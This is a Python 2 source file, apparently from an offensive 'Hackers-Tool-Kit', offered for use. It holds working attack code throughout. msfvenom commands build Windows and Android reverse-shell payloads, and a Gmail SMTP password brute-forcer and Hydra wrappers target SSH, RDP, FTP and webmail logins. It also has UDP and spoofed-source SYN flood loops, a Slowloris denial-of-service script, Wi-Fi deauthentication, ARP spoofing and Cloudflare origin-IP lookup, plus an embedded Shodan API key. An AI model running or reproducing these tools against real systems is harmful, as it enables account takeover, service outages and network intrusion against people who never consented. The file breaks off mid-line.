██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -about : about the creator / me -? : displays this message -clear : clears screen except for banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -\033[91m---------------------------------------------------------------------------------\033[0m - """ -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -def wifite(): - os.system("wifite") -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -def netdev(): - os.system("netdiscover") -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() - -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" - -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') - -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - os.system("cat /root/hackers-tool-kit/tools/formats.txt") - s = raw_input("Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) - os.system(a) -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", 